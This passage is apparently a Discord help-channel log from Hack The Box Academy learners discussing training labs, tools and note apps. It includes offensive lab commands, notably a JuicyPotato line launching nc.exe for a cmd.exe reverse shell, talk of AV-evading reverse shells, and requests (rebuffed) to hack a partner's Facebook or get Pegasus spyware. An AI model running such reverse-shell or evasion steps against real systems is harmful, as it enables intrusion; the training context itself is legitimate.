in which case you can make your added user an admin as well and psexec as that user

you can also try a powershell rev shell script saved to a file, run your exploit once with a cmd to pull your script down, and then a second time trying to execute the script alone, sometimes that gets around some no stacked queries limitations

of youre super insistent that it HAS to be a rev shell

So metasploit works

yup, its what metasploit does best

just give it a try and the manually way + web delivery work

Yeah, probably going to work!

the squirrel and the f0x at it again

thanx guys

also one more thing i just give it a try with hoaxshell and this tool is for bypassing av while getting a rev shell, the only issue i have with powershell rev shell is most of them don't work for me for some dumb reason but this seem to be working fine (no surprise with full RCE)

hoaxshell is nice, only issue is it works in a very weird and obvious manner so it has a pretty significant shelf life before its going to be outdated

Getting Started/Public Exploits.
I can't for the life of me get this to work.

Anyone care to help on the Vulnerability Assessment module?

Confused on how to authenticate to the host and view the web interface needed to see the scan data.

youre trying to read the flag stored within the web dir, but its stated to be located in the rootdir hence just /flag.txt

also not sure thats actually the right exploit but my memory can be faulty as its been awhile.

so the exploit should be reading the flag off the host?

https://www.rapid7.com/db/modules/auxiliary/scanner/http/wp_simple_backup_file_read/

I think its the right module

the one you posted appears to do so

let me try it with path /flag.txt

Nice completed sqlmap essentials

We r on a streak

Thanks! that did the trick.

Time to Pwn some boxes

Vulnerability Assessment: Figured how again how to access the scans. Use a browser to connect to the host. Should be https://(IP):8834

Can I get help for a machine?

if its module related sure can ask your question just specify which module and section its on. Otherwise check out #boxes

how do I get acces to it?

verify your account #welcome

Anyone free to discuss AD Enum/Attack Assessment (Part 2)? 99% there, just looking for a sanity check.

for sure man ask away

lmao you named the ss sussy_metasploit

yeah... don't look at any of my screenshot name 🤣

hey anyone have donethe shells and payloads live engagement?

this machine is slow as balls!
like for the last 1.5 hours i've barely been able to do what would take me 10 minutes on normal machine. this shit fuckin sucks ass no wonder htb only charges 8 dollars!

lmao, I was thinking about getting the vip so I joined the Disc to see everyone's opinions on it

it wont make a difference this machine is just slower than an 80 yr olds erection!

all the other machines pretty solid

it literally takes 5 seconds per command you type

and btw, why does my name look like this?

Oh nvm I get it, but the bot doesnt want to auth

same problem , please guide me

Alright thanks for inspiring me to swap over to obsidian now. It was a pain as it is and my notebook isn't huge yet. It would have been killer if I waited any longer

I was looking at Obsidian recently as well and would be interested in your opinion. Been using Cherrytree the last 2-3 years and it's getting kind of bulky.

Well, this isn't my first time using obsidian. I used it back when I first started but swapped to notion because I needed something that was easily portable.

The very obvious downside to obsidian is that it'll take some extra magic to allow you to sync your files across multiple locations

Aside from that though its very very good

I would really need something to be able to port my cherrytree to obsidian. I know there's something out there, but it requires some troubleshooting and I haven't had the time to debug it.

I really like the group/mapping that comes with Obsidian. Feels like a better way to organize your notes, especially at scale.

Need guidance on: Footprinting - Hard Lab. I have completed all the steps to reach the user on the ssh server, I have enumerated what feels like everything but cannot seem to see the way forward.

Oh hold on found something...

Got it.

Hi teams,
I’m stuck at the final question regarding “what user account has many Event ID (4625) logon failures”
This is what I’ve done:
get-winevent -FilterHashTable @{Logname=‘Security’;ID=4625} | select-object -expandproperty Message. Appreciate your help!

i dm u

hey you still on i for sure can help

sent a friend request

Hey guys not sure if this question is related to here or not but: By buying the university plan for HTB academy it grants me access to all tier 2 modules, but I am not sure if that includes Job paths. So If I get the university plan does that grant me access to a job path role, or do I have to get that separately?

it does include job paths. All modules contained inside the job paths are tier 2 or lower.

stuck on Attacking Common Applications - Skills Assessment II on the

Q3 What is the FQDN of the third vhost?

Already have the creds for the application but every answer i input is wrong.

Sanity Edit: After you get the foothold in the machine, run apachectl -S and it'll show every vhost on the IP address

in metasploit framework module in session and jobs section i am facing problems to get a session , facing an error "failed authentication " please guide me

stuck on Attacking Common Applications - Skills Assessment II

Last question - Where is the flag? Searched everywhere and still nothing

Edit: The flag is in the same directory you land in, i was just too tired to look for it in a bunch of files.

Guys when will SRT track will renew in hack the box?

quick question. does htb vip also teach how to hack a https website?

hai guise does htb academy teach me how to hack my girlfriend's facebook

cringe

snowflake behaviour

What specifically about HTTPS do you need to learn? Website stack and protocol are two different things really.

You don't "hack HTTPS".

look it is kinda useless to be able to find security faults in a http server because they almost don't exist anymore

Sure what are you struggling with? Bypassing WAF?

That is not what i mean.

it realy is just a yes/no question tbh idk why you are so tilted. we all know you did not shower for a week

I'm trying to help you buddy but you don't seem to know what you're asking.

well can you reverse shell a https website like you could with an http site?

The reverse shell comes from the server behind it, not the protocol it's serving you the website on.

then what does https secure?

The data you're transferring to and from the website.

At a super basic level think Wireshark in a cafe. HTTP plain text. HTTPS encrypted.

does that not make it impossible to send for example nc.exe

No. Otherwise every https website you visit would equally just be encrypted garbage that you can't render.

It's also decrypted.

so it makes the ip encrypted?

No

Behind the protocol nothing really changes. You could for example host a website that youbuilt today without an SSL certificate, and visit it with HTTP. You can set up SSL on the server and switch over to HTTPS and nothing will have changed on the stack.

No, the data you're transferring to and from it.

If you know your osi or tcp/ip model, everything at the ip layer is unencrypted. It’s the application layer that’s encrypted

so how does that help prevent you from getting hacked?

It prevents your data being snaffled up in transit.

It doesn't protect the server in any particular way.

okay I think I understand now

thanks i guess

Can i dm you? I've been fuzzing for days now...

24hr ffuf. dat wordlist 😭

nah multiple, changed stuff but just cant get valid creds :S

its the only thing i still need to do and it took me the longest lol

Which module? I'll avoid it xD

Skill Assessment - Broken Authentication

lol

@eternal moss dm me

Hey quick question, to get a repository its git clone (url) correct?

For github

yes

Okay, so I am trying to get a repository but I am getting a fatal repository error, it says not found. I am running ```sudo git clone https://github.com/danielmiessler/SecLists/blob/master/Discovery/DNS/subdomains-top1million-5000.txt

But I get this response. 
```fatal: repository 'https://github.com/danielmiessler/SecLists/blob/master/Discovery/DNS/subdomains-top1million-5000.txt/' not found

you can only clone the git not a specific file

if you want to download that file specifically you can wget or curl -o

Ohh, my brain wasn't working, let me try that

are you using the pwnbox or your own machine?

My own machine, I can't use the pwnbox as I only get one use out of it a day

parrot or Kali?

Parrot

Had to reinstall my entire system because I somehow corrupted it and lost almost all my files, and weirdly enough, it didnt have that file

ah okay. I wouldve told you that the kali repo has Seclists already but looks like you're good to go

I have SecLists, but not that one that I need

Also I tried Kali Linux, but it was so slow even though I gave it 8gb of ram and 1/2 my CPU, probably user error on my side lol

Ryzen 5 5600g, so it shouldn't have had any issues

But thank you for this, that helped made my brain work lol

yeah I've stuck to it especially when I take OSCP in the future

True

I may switch back as I liked the UI a little better, but I need to get a designated drive for linux so I can boot into that instead of running VM's

Both run the same for me. What are you using to virtualise?

I've noticed no difference in both. Kali breaks. Parrot breaks.

Kali has better repos so I went back to it

Paravirtualization interface?

yeah and you dont get support from OSCP if you use parrot

Well right now im just learning everything, once I get a full list of everything I need, im going to go back to kali linux, but its set to default on both

VMWare / Virtualbox etc

OH virtualbox, can't afford a paid one

I would invest into a paid one for snapshots and such

You can snapshot in Virtualbox for free.

#snapshotsnotabackup

I like to keep a snapshot of the VM post install with basic UI set up always haha

True

im not a fan of VBox but thats just me

I also learned to not do chmod 700 everything, as that breaks linux completely. I did that and lost 40 hours of work to corrupted files that I couldn't recover

I get that, I have literally no money just trying to learn this skill, because everywhere around me is looking for local pentesters for their networks

VirtualBox is fine tbh. Don't worry about it.

Yeah I havent had any issues besides my 1gbps connection gets limited to 10mbps inside of the machine even though I've made it have full duplex speeds

i use lxc for my kali / blackarch

i will be damned if there is a 0day on kernel but meh ill take the risk

lxc is cool but I need windows VMs too

you can use qemu also for windows

but i've multple machines so i just rdp in to a windows box if i need it

Hey guys, need some help for the Windows Privilege Escalation - Skills Assessment 1. I noticed the ||SeImpersonatePrivilege privilege|| and I'm trying to exploit it with ||Juicy Potato||, as in a previous lesson. I'm trying to run the following command: ||.\jp.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\users\public\nc.exe 10.10.x.y 4444 -e cmd.exe" -t *||, but I get a weird error:
||Testing {4991d34b-80a1-4291-83b6-3328366b9097} 53375
COM -> recv failed with error: 10038||

You need to specify CLSID

It's using a default one.

you can use the list on tool github

I ran the GetCLSID.ps1 script but it didn't give me any clsid?
`Name Used (GB) Free (GB) Provider Root

HKCR Registry HKEY_CLASSES_ROOT
Looking for CLSIDs
Looking for APIDs
Joining CLSIDs and APIDs`

https://ohpe.it/juicy-potato/CLSID/

tasklist

oh you don't need to run that because you can just use the default list on the tool github with test_clsid.bat

Not sure I understand. I ran the test_clsid.bat and it outputted stuff like:
{31143611-AC65-4568-AE76-8A9DAD50EA88} 10000
{c8b67f54-d1cb-44bf-9103-a1ab9a9ed8ad} 10000

But I get the exact same error when I try .\juicypotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\users\public\nc.exe 10.10.15.28 5566 -e cmd.exe" -t * -c "{c8b67f54-d1cb-44bf-9103-a1ab9a9ed8ad}"

I used the list for ||windows server 2016 standard||

If you run tasklist and run down the clsid list quickly from top to bottom you'll find a matching service pretty quickly btw.

oh i didn't know that thanks for the tip

tasklist doesn't show clsid? It's like
System Idle Process 0 0 4 K

it shows you running processes

and the clsid list shows you processes and their clsid

it's a good idea to understand what you're even doing rather than just smashing through scripts imo

I mean not in depth, but understand what the CLSID relates to even haha

I'm trying to but I literally have no idea what clsids are

i just check my note and i understand next to nothing so that's just great but basically if you put the test script with the list and to tool in the same directory and run the script it will give you result.log which is the list of CLSID that you can use

Glad I'm not the only one

So for me I think of them as unique identifiers for applications. In this instance you'll want the ID of a process running as system

All that bat file is doing is running a for loop against the list and juicypotato.exe lol

You don't need to understand them. On the juicy potato github there's a list of CLSIDs just pick one for the OS that you're on.

Some will work some won't. It's a bit of trial and error

I just tried 2 more random ones and it worked, gave me a shell

I hate Windows

🤷‍♂️

I find windows to be fascinating

But you do need to understand everything you're doing

windows is blackbox with a bit of manual that is incomplete

Yeah it's wild. Linux is boring 😄

Yea. Theres so much to learn with windows

There's so much more happening under the hood than most people realize

And so many ways to abuse built in features

Which is what makes it horrible imo

Especially coupled with the lack of information on how stuff works

Ehh. You can learn most of it with some research and experimentation

But most people don't like attacking windows cuz it takes so much longer to learn than linux

Ye

Some parts also feel like true legacy

Like they hacked together 20 years ago and left the same since "it works"

Based opinion

Also Windows being proprietary is a big reason not to like it especially from a privacy and security perspective. There have been studies that show that security vulnerabilities in Linux are fixed much faster than they are in windows

Well Microsoft is notoriously bad with security lol

Takes them forever to fix anything

And according to them "UAC isn't a security control so we don't care if people can bypass it"

I think they have gotten better

But you are completely correct that they have a bad history

The decentralization and lack of corporate bureaucracy makes linux more secure by design imo

Anyone for sqlmap essentials ?

What’s your issue?

What's the point of it then?

Or do they just not care about privilege escalation at all?

Just pinged you on DM

Alright, now i know what the solution is for the the endgame Broken Auth: Skills Assessment i've some feedback that could help others that are failing this module:

• ||first get a valid user that you did not made on the box||
• ||You can enumerate users 2 ways, don't try to privesc that way, first get a valid user||

i hope the mods don't think this is spoiling, else, just remove my comment

I am in HTB academy, I have started the topic of active directory and there is a question that does not give me as good, the question is the following “What container in AD holds deleted objects?”, I am putting that it is the AD recycle bin , but it does not give it to me as valid. Someone could help me to find out what is happening or to know if that question gives an error to the page or something

There's a whole section about it in the text you wre supposed to read.

A {ANSWER} is a container object in AD that holds deleted AD objects.

Okey i look for that

If you've given up reading by the 3rd page you're in for a rough ride xD

Okey i find that thanks

I had not read it well and I have not seen it, too many hours in front of the PC

Go take a break instead of wasting your time not absorbing information then 😄 Come back fresh and learn. 💪

Still having issues with the mounting to the share part of the "NTFS vs. Share Permissions" lesson of the Windows Fundamental module

Was able to connect to the share this time by disabling the firewall, but I'm still getting the error "mount point does not exist" error when I attempt to mount to the share. Any suggestions?

hi guys, sorry to disturb u, just buy the rastalab access but i cant find the info for the entry point anyone can help ? thx

use ++verify at #bot-commands and check #prolabs-rastalabs if that's what you need

oh okay thx

Good question

NoSQLi module, assessment II: is cracking a hash required? Since the procedure seems quite expensive, I'd love to know.

Anyone mind helping on Shells & Payloads? Im at the live engagement however the machine that you have to RDP to with xfreerdp is well, a bit messed up. THere is no browser whatsoever and it seems to be slow. Anyone else having this issue?

I don't think so

Thank you! I think I chose the wrong path, then.

Quick question on Password Attacks Lab - Easy: Will the provided user\pass\custom.rules get me past the front door? Going to take a long time if so... Password attempt 12246 of 9780576

(Password reset 😉 )

I did something radically more sophisticated, which gave me the user hash, which I can't crack 😦

Ooh...

😉

if you are interested (or the course author), feel free to DM me.

DM me.

DM me.

Shells & Payloads: This issue has a solution, just run firefox http://(IP) in your terminal to get a browser. Maybe not as self evident but it does work, and the box does have working internet connection.

The new Experimental Integrated Terminal on Academy is very cool.

Anywhere here finish the SQL injection foundations section in HTB Academy I have a question/ need some help

Anyone*

Yes

Roc Wool (593789667502194701) has been banned until 2023-02-23 19:25:43 (UTC).

anyone available for the last question on attacking SMB - Login as the user "jason" via SSH and find the flag.txt file. Submit the contents as your answer. Have the password but cannot ssh into the box as the indicated user, am i missing something? Module is attacking common services. Thank you

Tip: smbclient

not sure i get the tip, are you for a quick dm or explain further here?

You are not supposed to SSH with the credentials you have...

Hunt for something else (you give it 600 ;))

oh ok.. let me see if i can find it

ahhhh got it, thanks for the help!

What is a good way to get a response size using the curl command. I'm trying to utilize the -fs command on ffuf, but I need to figure out a way to get the response size. Thank you.

curl -s http://IP | wc -c

Does this do?

It does but it seems that error response sizes are only giving me 0. I'm currently working on the virtual hosts lab in the information gathering - web edition module.

ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/fierce-hostlist.txt -u http://10.129.32.102 -H "HOST: FUZZ.inlanefreight.htb" -fs (this is the command I'm trying to run)

here is a tip that will save you time, add the -ac flag and ffuf will take care of filtering and matching

Thank you friend, ffuff seems to be returning the correct subdomains now.

Hello, the AD that controls the authentication requests for the domains is the domain controller, right?

Can someone help me with attacking common webapplications osticket

Broken authentication - predictable reset token - question#2.
I understand the coding algorithm for htbuser, but what to do next? How can i change htbadmin password, if the token is sent to htbadmin email?

@hazy grotto hey thought I message you here. Better channel, but yeah both ways work. Also if you need help I have almost finished the entire module. Just need one more question lol

I Dm'd you

Damn what do i need to do with osticket

Get the creds?

I guess is not signing up at gitlab

Long time no see!

HEYYYY!!!!!

Missed you

Dont mind i got it

Anyone mind providing help on Shells & Payloads, live engagement with host 2? the exploits isn't working properly

i got you

@iron basin i messaged you

Shells & Payloads, Live engagement, Host 2: If you ever run into an error running the exploit in metasploit, the code doesn't need to be changed. The option VHOST needs to be set to the url of the website i.e. blog.inlanefreight.local.

4 hours of my life vanished going through that engagement. I guess most engagements last a year so I’ll consider myself lucky. 😉

yeah that one was a biiiiitch

itd be easy if it didn't take 10 seconds per click or command

Bahaha. The blog website scrolling was brutal

Is there a way to make the RDP window bigger? That killed me too.

rdesktop but the machine was slow as shiiiit

can do -f option for full screen but that isn't good b/c can't use host desktop

there was one more rdp that let you manually adjust the windows rdesktop is supposed to but machine wouldn't readjust(the target machine)

Ye it was long, but the feeling of joy when you get it finally haha

Yeah small screen is a pain

I guess my joke didn’t land but thanks

For your assistance

hello @everyone can i have help on the local file inclusion final skill assessment module ?? thanks

Hi everyone, anyone knows how to get pegasus spyware for free?

Hi prens !

how to get my roles?

No mate. Not here

stuck with the first question in web proxies skill assessment with the /lucky.php button thing. i inspect element and removed disabled in the thing and enabled the button and when i click on it it still doesn't give me the flag

Then where

that button will give you the flag randomly but the chance is kinda low

@rustic sage if u have access to the internet u can understand that pegasus is not free